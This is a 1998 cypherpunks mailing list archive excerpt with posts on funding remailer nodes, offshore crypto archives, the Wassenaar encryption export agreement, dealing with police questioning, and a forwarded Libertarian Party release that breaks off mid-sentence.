YOUR best interest? I'd guess never, that takes a committment.

Hell, if it wasn't for Igor and myself you wouldn't in all likelyhood even
have this place to bitch. It would have disappered over a year ago. Nobody
else (even the the co-creator TC May) was willing to save it. Now we've got
6 nodes (1 in Japan) which makes it very difficult to completely shut down
legaly, physicaly, or through acts of God (eg tree falls or fires).

You could put up a CDR node and finance it each month by smoking 1/4 ounce
less of your pot. It's cheap, cheap, cheap.

Piss off junior.



    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
                                                Howard Zinn

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Todd Larason <jtl@molehill.org>
Date: Wed, 9 Dec 1998 07:17:05 +0800
To: Anonymous <cypherpunks@EINSTEIN.ssz.com
Subject: Re: Altavista hacked
In-Reply-To: <199812082203.XAA25646@replay.com>
Message-ID: <19981208141054.B29422@molehill.org>
MIME-Version: 1.0
Content-Type: text/plain



On 981208, Anonymous wrote:
> 
> It appears that www.altaviata.com has been hacked.

What does altaviata.com have to do with Alta Vista?  

> Wish
> DNSsec was deployed, it might of prevented this.

DNSsec will prevent typos?
-- 
ICQ UIN: 126780687




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ulf@fitug.de (Ulf =?iso-8859-1?Q?M=F6ller?=)
Date: Tue, 8 Dec 1998 21:54:06 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Building crypto archives worldwide to foil US-built Berlin Walls (fwd)
In-Reply-To: <199812080331.VAA07823@einstein.ssz.com>
Message-ID: <199812081311.OAA112802@public.uni-hamburg.de>
MIME-Version: 1.0
Content-Type: text/plain



According to Jim Choate:

> And this is different from yesterday how?

It is different in that it has been legal to distribute PGP and any
other public domain and mass market crypto software from Denmark
up to now.

> Are you offering to put up your monies to provide any and all legal and
> other support for any such site that participates? When is your site going
> up?

John Gilmore's RSAREF site went up about a year ago. Your point being what?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 9 Dec 1998 05:08:29 +0800
To: ichudov@Algebra.COM (Igor Chudov)
Subject: Re: I Got Mine
In-Reply-To: <199812081757.MAA06069@mail1.panix.com>
Message-ID: <199812081915.OAA18143@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 12:07 PM 12/8/98 -0600, Igor Chudov @ home wrote:

>What I am looking for is a practical guide book on how to deal with
>cops and other law enforcement/jackbooted thug types, in the manner
>that minimizes my long term damage. Something along the lines of "You
>and the Police!", by Boston T. Party, a book that I greatly enjoyed.

Well here's an article:

How to Break the Law

by Duncan Frissell

http://eastedge.neurospace.net/cyber/xanner/lawbreak.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Wed, 9 Dec 1998 07:20:36 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: The problem with 'Gilmore's RSAREF' site... (fwd)
Message-ID: <5F152E6E8E6FD21195DF00104B2425AD02B339@yarrowbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




> Further, he's not willing to extend his legal protection to help 
> others.

Has there been any indication that the EFF would not support or help someone
being persecuted for crypto-export disobedience? I wouldn't rely on such
charity, nor is charity ever obligatory (that's socialism), but what reason
do you have to discount it?

The essence of civil disobedience is many many individual targets, not one
organization.

> When is YOUR CDR node going up 

Fine, if that is the source if your righteousness, I will put one up 1Q99. I
won't even play the my network is bigger than your network pissing match,
but I will put my money where my mouth is if you think hosting a list node
is that big of a deal.

I'm am not critical of any contribution, but I will be critical of someone
chastising others contributions simply because they would do it differently.
A call to arms to protect liberty is not a draft. If you don't want a gun,
then don't take it, I won't even call you a Tory.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 9 Dec 1998 05:40:39 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Building crypto archives worldwide to foil US-built Berlin Walls (fwd)
Message-ID: <199812082032.OAA13166@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 08 Dec 1998 19:20:34 +0100
> From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
> Subject: Re: Building crypto archives worldwide to foil US-built Berlin Walls (fwd)

> I don't know. But maybe Switzerland, a neutral country in wars,

I suspect that with their reversal concerning anonymous numbered accounts
and other similar changes in their laws and their enforcement that none of
the fully developed countries in N. America, W. Europe, Pacific Rim would
be good candidates for this sort of shenanigan without some legal backing
from the get go. That leaves S. America, Africa, E. Europe, Middle East,
India, and China. Not a lot of hope there. If it's not political issues,
it's no economies, no modern infrastructure, religious, etc. 

Besides, do you really want to trust a country that funded the Nazi'a when
they claimed neutrality? There continues neutrality is a ruse because it's
convenient to trap those who aren't smart enough to ask why they manage to
survive when their neighbors are toast. And it ain't because the mountains
are high or everyone is armed. Just look at Barbarossa.

> such a site could be erected. Of course it is a resource problem.

No, it isn't. I fund my entire site for about $600/mo out of my own pocket.
ISDN, DNS, 24 hour access, etc. That's cheap for fighting abuses of civil
liberties by organizations whose bugdets are measured in big-B's. My main
box (einstein) is a 486DX2/80 20M ram, 2G of drive running Linux 1.1.59 for
the last 4 years. I just gave away 10 Sun 3/60's and HP/Apollo 400's that
would be perfect for this sort of stuff except nobody is willing to do it.
People are always giving me machines in the hope that I can either do
something with them or can find somebody else who will; They're mighty rare
(the people that is).

I'm in the process of looking at DirectPC for a means to give my domain a
fully functional mobile site. I'm looking at a couple of hundred dollars a
month for that over a thousand or so for the hardware. Use Linux and run it
off your car (Ok, I've a Brono II so it's a bit more convenient) via a
converter. People are pretty intrigued when I put the dish in the back and
drive around. Setup is easy, pull the dish from the back and clamp it on the
baggage rack and site it. Hook a cell phone up for uplinks and sit back with
a 400k max downlink. What's really cool is the dish I've been playing with
has a DirectPC lmb and two DSS lmb's as well. The whole setup was less than
$500 (minus the DSS tuners).

I recognize that say $1k/mo. is a lot for most folks but the real interesting
question is why the better funded cpunks aren't doing this sort of stuff
when they claim such committment to the cause. Gilmore, TC May, etc. are
clearly financialy capable of such activities. Such organizations as EFF and
EF-Texas/Georgia clearly could raise these sorts of funds to further their
suggestions to the rest of us, yet they don't. The best we get from them is
requests for us to do it alone.

There are times when I read some of May, Gilmore, Declan, etc. missives and
wonder who it is they REALLY work for. Why is it they consistently don't
follow through on their own suggestions?

> But nowadays storage is getting cheaper. If one has a server machine,
> it shouldn't be too big a problem to set up an archive.

Yeah, two hours of work and it's there. Dirt simple.

> to obtain a compiler and run the installation script. That way
> storage space can be highly reduced.

I'm buying 3G drives for less than $200 and I checked with John Young's
archive and his entire archive is a tad over 200M. My guess is the entire
web contents regarding crypto could be put down in a couple of gigs.

Technical resources are not the issue. It's finding people who are willing
to put themselves in harms way for their beliefs. Very few people have the
strength of their convictions (most likely because they don't have any). I'd
say most folks are motivated by mental masturbation.



    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
                                                Howard Zinn

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 9 Dec 1998 05:54:59 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Power Outage in San Fransisco/bay area (fwd)
Message-ID: <199812082045.OAA13307@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 8 Dec 1998 13:27:18 -0800 (PST)
> From: Max Inux <maxinux@bigfoot.com>
> Subject: Power Outage in San Fransisco/bay area

> Well, we are going on hour 4 now, most of the power is back.  One group of
> 2-4 employees caused it they say.  This was admitted 3 hours later, and
> then they knew 15 minutes after it happens.. typical.  They expect to be
> back on by this afternoon

Damn, you beat me to it. I was going to post something about a dry run for
Y2K in San Fran.

Any rioting?


    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
                                                Howard Zinn

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Wed, 9 Dec 1998 07:38:03 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: FW: Survey Says Kids Feel 'Threatened' By Real Life
Message-ID: <5F152E6E8E6FD21195DF00104B2425AD02B33A@yarrowbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




   A survey has suggested that up to one and a half million British 
   children may have been upset by something they have heard or read.
   
   The NOP poll shows that one in five of nearly 4,000 children between
   the ages of six and 16 interviewed for the survey between September
   and October this year were "uncomfortable" with the state of world
   affairs.
   
   In the UK, 7.2 million children are estimated to be exposed to the
   outside world - roughly 98% of all children between six and 16.
   
   Of those who have had negative experiences while being outside the
   home, the largest proportion - 40% - had seen something "rude".
   
   'Not surprised'
   
   One in seven said they had encountered information that had 
   "freightened them", while 25% heard ideas that "would get them 
   into trouble".
   
   NOP Associate Director Rob Lawson described the numbers as a
   "significant minority".
   
   The children's charity NCH Action for Children suggested the survey
   strengthened calls for censorship to protect younger people.
   
   Charity spokesman John Carr said: "I regret to say I'm not surprised
   by this survey's findings, it's what we have been saying for some
   time.
   
   Censors
   
   "Parents need to know their children are learning in safety and
   security. At the moment, they have no way of knowing that at all."
   
   NCH Action for Children, which advises the government on children's
   issues, backs the introduction of censors - people who filter out 
   ideas unsuitable for children.
   
   The survey, called Kids.net, was paid for by Microsoft, the NSA,
   the GOP, China, and MCI/Worldcom in syndicate.
   
   The Department of Trade and Industry's forthcoming review on Internet
   regulation is expected to be published before Christmas.

[satire on news from news.bbs.co.uk]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Wed, 9 Dec 1998 06:30:58 +0800
To: declan@well.com (Declan McCullagh)
Subject: Re: I Got Mine
In-Reply-To: <4.0.2.19981208155702.0147d100@mail.well.com>
Message-ID: <199812082113.PAA11007@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Declan McCullagh wrote:
> 
> At 12:07 PM 12-8-98 -0600, Igor Chudov @ home wrote:
> >What I am looking for is a practical guide book on how to deal with
> >cops and other law enforcement/jackbooted thug types, in the manner
> >that minimizes my long term damage. Something along the lines of "You
> >and the Police!", by Boston T. Party, a book that I greatly enjoyed.
> 
> BTW BTP has just come out with a Y2K book. It's a great read.

Is it a useful book? BTP writings are always fun to read, but some of
his recommendations seem suspect.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Wed, 9 Dec 1998 07:52:08 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: FW: Survey Says Kids Feel 'Threatened' By Real Life
Message-ID: <5F152E6E8E6FD21195DF00104B2425AD02B33B@yarrowbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




Ack, I missed one. Revised:

----------

Subject: FW: Survey Says Kids Feel 'Threatened' By Real Life



   A survey has suggested that up to one and a half million British 
   children may have been upset by something they have heard or read.
   
   The NOP poll shows that one in five of nearly 4,000 children between
   the ages of six and 16 interviewed for the survey between September
   and October this year were "uncomfortable" with the state of world
   affairs.
   
   In the UK, 7.2 million children are estimated to be exposed to the
   outside world - roughly 98% of all children between six and 16.
   
   Of those who have had negative experiences while being outside the
   home, the largest proportion - 40% - had seen something "rude".
   
   'Not surprised'
   
   One in seven said they had encountered information that had 
   "freightened them", while 25% heard ideas that "would get them 
   into trouble".
   
   NOP Associate Director Rob Lawson described the numbers as a
   "significant minority".
   
   The children's charity NCH Action for Children suggested the survey
   strengthened calls for censorship to protect younger people.
   
   Charity spokesman John Carr said: "I regret to say I'm not surprised
   by this survey's findings, it's what we have been saying for some
   time.
   
   Censors
   
   "Parents need to know their children are learning in safety and
   security. At the moment, they have no way of knowing that at all."
   
   NCH Action for Children, which advises the government on children's
   issues, backs the introduction of censors - people who filter out 
   ideas unsuitable for children.
   
   The survey, called Kids.net, was paid for by Microsoft, the NSA,
   the GOP, China, and MCI/Worldcom in syndicate.
   
   The Department of Trade and Industry's forthcoming review on Thought
   regulation is expected to be published before Christmas.

[satire on news from news.bbs.co.uk]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Max Inux <maxinux@bigfoot.com>
Date: Wed, 9 Dec 1998 07:24:10 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: Power Outage in San Fransisco/bay area (fwd)
In-Reply-To: <199812082045.OAA13307@einstein.ssz.com>
Message-ID: <Pine.LNX.4.02.9812081549440.2927-100000@khercs.chipware.net>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 8 Dec 1998, Jim Choate wrote:
>Damn, you beat me to it. I was going to post something about a dry run for
>Y2K in San Fran.
>
>Any rioting?

Suprisingly, no looting, major accideents (Only one was in the unaffected
Fremont) by Mowry...  dont go towards NAI or Great America ;-)

Max <maxinux@openpgp.net>
New PGP Keys available





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 9 Dec 1998 08:21:35 +0800
To: cypherpunks@cyberpass.net
Subject: Re: I Got Mine
In-Reply-To: <199812081807.MAA06805@manifold.algebra.com>
Message-ID: <v03130301b2936a5fd60d@[209.66.100.84]>
MIME-Version: 1.0
Content-Type: text/plain



At 2:34 PM -0800 12/8/98, Jay Holovacs wrote:

>There is some general information about what to do if stopped by the police
>at the ACLU site:
>
>www.aclu.org
>
>In addition to the good advice that was given on this list to keep your
>mouth shut, I would like to comment on someone's earlier (several days ago)
>post. He had commented that the subject of spoofed messages came up in a
>discussion with an agent, and the agent asked about what this term meant.
>Don't let them draw you into such a discussion. They probably know damn
>well what these terms mean, they want to hear what you say they mean. You
>are being mind probed.
>
>Be polite, don't let them get you to say something angry or stupid, and say
>nothing more than civil response requires.

Not much you can say to them while standing out in the cold, in any case.

(Surely you will not invite them into your home! As we all know, anything
they happen to observe while doing a "wander through," even if on the way
to a seat, is usable for the purposes of obtaining a search warrant.)

I agree with Jay and others that attempting to "educate" them is a lost
cause...John Perry Barlow discovered this some years back when he was
interviewed by FBI agents over the Steve Jackson Games case (if I recall
the particulars correctly). Talking to them about particular list
personalities is _especially_ dangerous, as it helps them build whatever
case they've decided to build. "Anything you say can and will be used
against you."

If O.J. didn't have to talk, either to the police, the DA, or in court, why
should anyone else? (I know this does not encompass all witnesses, but it
captures the key idea of the Fifth for us here. Let them issue a subpoena.
And even then one may not have to talk.)

They haven't tried to talk to me...at least they haven't either gotten
through on my often-busy phone line nor have they driven out from Monterey
or San Jose to my semi-rural home.

I _hope_ I have the presence of mind to just tell them I won't be telling
them anything. Just nothing, not even jabber about a lawyer. Just nothing.
Maybe not even confirming my name...after all, I'm not driving and they
can't compell me to produce a driver's license.

I expect that if they stay around in my driveway, on my property, I'll call
out for them to leave. Beyond that they'd be trespassing.

If I slip up and say more, I'll try to swallow my pride and tell you all
just how badly I screwed up.

--Tim May

Y2K -- LMGALMAO -- Loading my guns and laughing my ass off
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 9 Dec 1998 06:11:09 +0800
To: frissell@panix.com (Duncan Frissell)
Subject: Re: I Got Mine
In-Reply-To: <199812081757.MAA06069@mail1.panix.com>
Message-ID: <4.0.2.19981208155702.0147d100@mail.well.com>
MIME-Version: 1.0
Content-Type: text/plain



At 12:07 PM 12-8-98 -0600, Igor Chudov @ home wrote:
>What I am looking for is a practical guide book on how to deal with
>cops and other law enforcement/jackbooted thug types, in the manner
>that minimizes my long term damage. Something along the lines of "You
>and the Police!", by Boston T. Party, a book that I greatly enjoyed.

BTW BTP has just come out with a Y2K book. It's a great read.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 9 Dec 1998 06:11:03 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Re: Building crypto archives worldwide to foil US-built Berlin Walls (fwd)
In-Reply-To: <199812082032.OAA13166@einstein.ssz.com>
Message-ID: <199812082111.QAA28988@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim wrote:

An inspiring recipe for a mobile rig. Well done. Gotta get one,
chop this tether.

>I'd say most folks are motivated by mental masturbation.

Right. That's my credo, life long. Love it. Want more. Now. Unh,
unh, unh. Used to be called religious ecstacy, faith in god, 
metaphysical certainty, doubt erased by infinite wisdom, 
beatific blissful ignorance, vision brainward, sparkling ricochets, 
zing, zap, blit, parthogenesis. Hungry vet, got a dime?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 9 Dec 1998 08:48:29 +0800
To: cypherpunks@cyberpass.net
Subject: wassenar crypto agrmt/wiretapping
Message-ID: <199812090001.QAA14558@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Jonathan David Boyne <boyne@hawaii.edu>
To: Undisclosed recipients:;
Subject: [exploration] The Wassenaar Invasion of Privacy (fwd)

>from:
>http://www.zolatimes.com/V2.41/pageone.html
><A HREF="http://www.zolatimes.com/V2.41/pageone.html">Laissez Faire City
Times
>- Volume 2 Issue 41</A>
>The Laissez Faire City Times
>December 7, 1998 - Volume 2, Issue 41
>Editor & Chief: Emile Zola
>-----
>The Wassenaar Invasion of Privacy
>
>by J. Orlin Grabbe
>
>
>>From the first moment it proclaimed the "information superhighway", the
>Clinton administration has waged a wholesale assault on Internet free
>speech and privacy.
>
>The latest blow is the Clinton administration's strong- arming of the 32
>fellow countries of the Wassenaar Arrangement to agree to an export ban
>on strong cryptographic (data scrambling) software. The net effect will
>be to make it easier for each government to read its own citizen's email
>and other private documents.
>
>Normally if a nation attempts to restrict the domestic sale of strong
>encryption software, that attempt is made ineffective by the
>availability of strong encryption software from other countries. But
>such software won't be available anymore--at least not from one of the
>Wassenaar countries, once they have enacted local legislation to
>implement the terms of the Wassenaar agreement of December 2.
>
>The Wassenaar Arrangement is supposed to be an intergovernmental
>agreement to restrict international traffic in arms. What does this have
>to do with encryption? Simply this: the US government still holds that
>secret-code-producing software is a munition. So if you encrypt your
>letters and files, and the government hasn't given you permission to use
>that caliber encryption, then the person who gave you the encryption
>software may be in violation of some regulation on arms dealing.
>
>"They've plugged a loophole," gleefully proclaimed Ambassador David
>Aaron, the President's Special Envoy for Cryptology. The day following
>the agreement, the US Department of Commerce issued a press release in
>which Aaron spouts gobble-de-gook phrases about a "level playing field"
>and about balancing "commercial and privacy interests with national
>security and public safety concerns" (see Appendix A for Commerce Dept.
>press statement).
>
>How has this agreement supposedly created a "level playing field" and
>helped U.S. industry? Well, namely, by censoring foreign publishers of
>cryptology software in the same way that the US government already
>censors US publishers. This is similar to arguing that by increasing
>tyranny in surrounding countries, we can create a "level playing field"
>for freedom.
>
>"It's ironic, but the US government is leading the charge
>internationally to restrict personal privacy and individual liberty
>around the world," said Alan Davidson, a staff counsel at the Center for
>Democracy and Technology, according to Reuters (see Appendix B for
>Reuter's news release).
>
>A restriction on cryptology is a restriction on free speech. In the
>Second World War, the US used native Navaho speakers for secure
>communications. Since no one else understood the language, it served as
>a powerful secret code. But is what you speak or write in an email
>message suddenly not speech or language if the government can't
>understand it? If your message says "Xu23MN iilc]z MNBl", does the
>government suddenly have the right to imprison you for writing
>gibberish?
>
>While the clear answer is No, nevertheless the US government thinks it
>has the right to restrict your "gibberish" if it is produced by
>encryption software that it can't crack. The Wassenaar agreement says
>encryption software that is "weak" (less than 56 bit keys in some cases,
>or less than 64 bit keys in others), so that the government can
>unscramble and read the real message underneath the gibberish, is okay,
>and in fact frees up some export restrictions on this type of software.
>The trade-off? Greater restrictions on software that produces secret
>code the government can't read.
>
>Arms control. It sounds wonderful, doesn't it? Go over to the Wassenaar
> web page and take a look. High nobility of purpose, right? "We're
>keeping those guns away from the Indians," they proclaim. But what they
>mean to say is: "We fully intend to read what is written on the hard
>drive of your computer."
>
>Posting to the cypherpunks mailing list, Timothy May noted:
>
>I recently heard T. J. Rodgers, CEO of Cypress Semiconductor, repeat his
>oft-made point that Silicon Valley and the high tech industry gains
>nothing by talking to Washington. That as soon as dialog is started with
>Washington, things get worse. This applies as well to crypto, to gun
>rights, to everything. Everything Washington touches turns to statist
>shit.
>
>Is there any good news? Enabling legislation has to be enacted in each
>country to carry out the terms of the Wassenaar agreement. Raising a hue
>and cry with legislators over this latest invasion of privacy should
>have a positive effect.
>
>In the meantime, Mr. "Information Superhighway" Al Gore is poised for a
>presidential run, so he can continue to ignore privacy concerns and bend
>over for the Big Brother agencies of the national security
>establishment.
>
>------------------------------------------------------------------------
>
>Related Links
>
>The End of Ordinary Money: Part 1
>The End of Ordinary Money: Part 2
>
>
>
>------------------------------------------------------------------------
>Appendix A: Commerce Dept. Press Release
>
>
>UNITED STATES DEPARTMENT OF COMMERCE NEWS
>
>International Trade Administration
>
>Washington, DC
>
>For Immediate Release
>Tuesday, December 3, 1998
>
>Contact: Maria Harris Tildon
>          (202)482-3809
>          Sue Hofer
>          (202)482-2721
>
>P R E S S  S T A T E M E N T
>
>U.S. Applauds Agreement on Encryption in International Export
>Control Regime
>
>Vienna, Austria -- The United States welcomed the decision taken
>Thursday in Vienna by the 33 members of the Wassenaar Arrangement
>to modernize and improve multilateral encryption export controls.
>Ambassador David Aaron, the President's Special Envoy for Cryptology,
>said that "the international agreement reached here goes a long way
>toward leveling the playing field for exporters and promoting
>electornic commerce.  It provides countries with a stronger
>regulatory framework to protect national security and public safety."
>
>The agreement caps a two year effort by the United States, to update
>international encryption export controls and to balance commercial
>and privacy interests with national security and public safety
>concerns. Thursday's agreement simplifies and streamlines controls
>on many encryption items and eliminates multilateral reporting
>requirements. Specific improvements to multilateral encryption
>controls include removing controls on all encryption products at
>or below 56 bit and certain consumer entertainment TV systems, such
>as DVD products, and on cordless telephone systems designed for
>home or office use.
>
>Wassenaar members also agreed to extend controls to mass-market
>encryption above 64 bits, thus closing a significant loophole in
>multilateral encryption controls.  This gives Wassenaar member
>governments the legal authority to license many mass market
>encryption software exports which were previously not covered by
>multilateral controls and enables governments to review the
>dissemination of the strongest encryption products that might
>fall into the hands of rogue end users.   The new controls also
>extend liberalized mass-market hardware below 64 bits.  Until
>today, only mass-market software products enjoyed this
>liberalized treatment.
>
>"The decisions taken here in Vienna reinforce the Administration's
>efforts to promote a balanced encryption policy," Aaron confirmed.
>
>
>
>------------------------------------------------------------------------
>Appendix B: Reuters News Release
>
>
>Thursday, 3 December 1998 12:57:40
>
>U.S. claims success in curbing encryption trade
>
>Aaron Pressman, Reuters, Washington newsroom, 202-898-8312
>
>WASHINGTON (Reuters) - Clinton administration officials
>Thursday said they had persuaded other leading countries to
>impose strict new export controls on computer
>data-scrambling products under the guise of arms control.
>
>At a meeting Thursday in Vienna, the 33 nations that have
>signed the Wassenaar Arrangement limiting arms exports --
>including Japan, Germany and Britain -- agreed to impose
>controls on the most powerful data-scrambling technologies,
>including for the first time mass-market software, U.S.
>special envoy for cryptography David Aaron told Reuters.
>
>The United States, which restricts exports of a wide range of
>data-scrambling products and software -- also known as
>encryption -- has long sought without success to persuade
>other countries to impose similar restrictions.
>
>``We think this is very important in terms of bringing a level
>playing field for our exporters,'' Aaron said.
>
>Leading U.S. high-technology companies, including Microsoft
>Corp. and Intel Corp., have complained that the lack of
>restrictions in other countries hampered their ability to
>compete abroad. The industry has sought to have U.S.
>restrictions relaxed or repealed, but has not asked for tighter
>controls in other countries.
>
>Privacy advocates have also staunchly opposed U.S. export
>controls on encryption, arguing that data-scrambling
>technologies provided a crucial means of protecting privacy in
>the digital age.
>
>``It's ironic, but the U.S. government is leading the charge
>internationally to restrict personal privacy and individual
>liberty around the world,'' said Alan Davidson, staff counsel at
>the Center for Democracy and Technology, a Washington-based
>advocacy group.
>
>Special envoy Aaron said the Wassenaar countries agreed to
>continue export controls on powerful encryption products in
>general but decided to end an exemption for widely available
>software containing such capabilities.
>
>``They plugged a loophole,'' Aaron said.
>
>The new policy also reduced reporting and paperwork
>requirements and specifically excluded from export controls
>products that used encryption to protect intellectual property
>-- such as movies or recordings sent over the Internet -- from
>illegal copying, Aaron said.
>
>Encryption uses mathematical formulas to scramble
>information and render it unreadable without a password or
>software ``key.'' One important measure of the strength of the
>encryption is the length of the software key, measured in bits,
>the ones and zeros that make up the smallest unit of computer
>data.
>
>With the increasing speed and falling prices of computers,
>data encrypted with a key 40 bits long that was considered
>highly secure several years ago can now be cracked in a few
>hours. Cutting-edge electronic commerce and communications
>programs typically use 128-bit or longer keys.
>
>Under Thursday's agreement, Wassenaar countries would
>restrict exports of general encryption products using more
>than 56-bit keys and mass-market products with keys more
>than 64 bits long, Aaron said.
>
>Each country must now draft its own rules to implement the
>agreement.
>
>-30-
>
>from The Laissez Faire City Times, Vol. 2, No. 41, Dec. 7, 1998
>------------------------------------------------------------------------
>The Laissez Faire City Times is a private newspaper. Although it is
>published by a corporation domiciled within the sovereign domain of
>Laissez Faire City, it is not an "official organ" of the city or its
>founding trust. Just as the New York Times is unaffiliated with the city
>of New York, the City Times is only one of what may be several news
>publications located in, or domiciled at, Laissez Faire City proper. For
>information about LFC, please contact CityClerk@LFCity.co
>
>Published by
>Laissez Faire City Netcasting Group, Inc.
>Copyright 1998 - Trademark Registered with LFC Public Registrar
>All Rights Reserved
>-----
>Aloha, He'Ping,
>Om, Shalom, Salaam.
>Em Hotep, Peace Be,
>Omnia Bona Bonis,
>All My Relations.
>Adieu, Adios, Aloha.
>Amen.
>Roads End
>Kris
>
>DECLARATION & DISCLAIMER
>==========
>CTRL is a discussion and informational exchange list. Proselyzting
propagandic
>screeds are not allowed. Substance-not soapboxing!  These are sordid
matters
>and 'conspiracy theory', with its many half-truths, misdirections and
outright
>frauds is used politically  by different groups with major and minor
effects
>spread throughout the spectrum of time and thought. That being said, CTRL
>gives no endorsement to the validity of posts, and always suggests to
readers;
>be wary of what you read. CTRL gives no credeence to Holocaust denial and
>nazi's need not apply.
>
>Let us please be civil and as always, Caveat Lector.
>
>========================================================================
>To subscribe to Conspiracy Theory Research List[CTRL] send email:
>SUBSCRIBE CTRL [to:] LISTSERV@LISTSERV.AOL.COM
>
>To UNsubscribe to Conspiracy Theory Research List[CTRL] send email:
>SIGNOFF CTRL [to:] LISTSERV@LISTSERV.AOL.COM
>
>Om
>

- - ------------------------------------------------------------------------
Sponsored by NextCard Internet Visa.
http://ads.egroups.com/click/136/1


Free Web-based e-mail groups -- http://www.eGroups.com




- - --------------F29987D12CAF6600E1F2D03D--


- ------- End of Forwarded Message


------- End of Forwarded Message




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 9 Dec 1998 08:49:29 +0800
To: cypherpunks@cyberpass.net
Subject: libertarians advocate suing govt
Message-ID: <199812090001.QAA14587@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




------- Forwarded Message


Subject: 
        Release: Sue the Government?
   Date: 
        Tue, 08 Dec 98 01:02:13 PST
   From: 
        announce@lp.org
     To: 
        announce@lp.org (Libertarian Party announcements)




- - -----BEGIN PGP SIGNED MESSAGE-----

=======================================
NEWS FROM THE LIBERTARIAN PARTY
2600 Virginia Avenue, NW, Suite 100
Washington DC 20037
=======================================
For release: December 8, 1998
=======================================
For additional information:
George Getz, Press Secretary
Phone: (202) 333-0008 Ext. 222
E-Mail: 76214.3676@Compuserve.com
=======================================


A radical idea: Why can't people sue
politicians for their deadly programs?

        WASHINGTON, DC -- If politicians can sue gun and tobacco
companies for damages caused by their products, why can't ordinary
Americans sue politicians for the destruction caused by their products:
Government programs?

        "Government programs -- such as wars, exploding automotive air
bags, and grisly radiation experiments -- have killed and maimed tens
of thousands of Americans over the years," said Steve Dasbach, national
director of the Libertarian Party.

        "Americans shouldn't tolerate a double standard of justice, one
for the politicians and one for the people. It's time to start holding
the government accountable."

        What started Libertarians thinking in this direction? The fact
that 41 state governments are about to divvy up a $40 billion
settlement against tobacco companies, said Dasbach -- and the fact that
several big-city mayors are deciding whether to join New Orleans in its
lawsuit against gun manufacturers.

        With those legal actions serving as an inspiration, he said,
why not prosecute the government for:

        * War deaths: "Recent military actions totally unrelated to
U.S. national security -- like those in the Persian Gulf, Lebanon,
Panama, and Somalia -- have claimed hundreds of American lives,"
Dasbach said. "If gun company executives can be held liable when
criminals use guns irresponsibly, why not hold presidents and
